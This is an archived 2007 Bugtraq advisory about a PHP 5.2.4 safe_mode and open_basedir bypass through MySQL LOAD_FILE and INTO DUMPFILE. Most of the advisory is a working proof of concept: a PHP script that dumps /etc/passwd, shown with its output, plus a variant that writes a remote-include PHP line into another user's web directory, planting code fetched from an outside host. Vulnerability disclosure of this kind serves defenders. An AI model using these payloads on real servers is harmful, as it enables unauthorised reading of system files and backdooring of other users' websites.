Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > bugtraq > 07 > 091073.html (Request Expert securityfocus.com Support)

PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass

From: <laurent.gaffie(at)gmail.com>
Date: Tue Sep 11 2007 - 00:38:47 EDT


Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix
Bug: safemode & open_basedir bypass

  1. Introduction
  2. Bug
  3. Proof of concept
  4. Credits
  5. Introduction

"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML."


2) Bug

various mysql functions safemode & open_basedir bypass ( LOAD_FILE , INTO DUMPFILE , INTO OUTFILE )

3)Proof of concept

/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15) Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies */

debian:/test/mysql# ls
debian:/test/mysql#

<?php
mysql_connect("localhost", "granted_user","something"); mysql_query("select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';"); ?>

debian:/test/mysql# ls
123.txt 

debian:/test/mysql#
debian:/test/mysql# vim 123.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync

variant : select '<?include("http://site.com/hello.html")?>' into dumpfile '/home/NOT_MY_USER/www/index1.php';


4)Credits & greets

laurent gaffié
laurent.gaffié@gmail.com

greets: Mattias Bengtsson (see http://php.net). Received on Tue Sep 11 11:45:09 2007

Do you need help?X

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:15:12 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library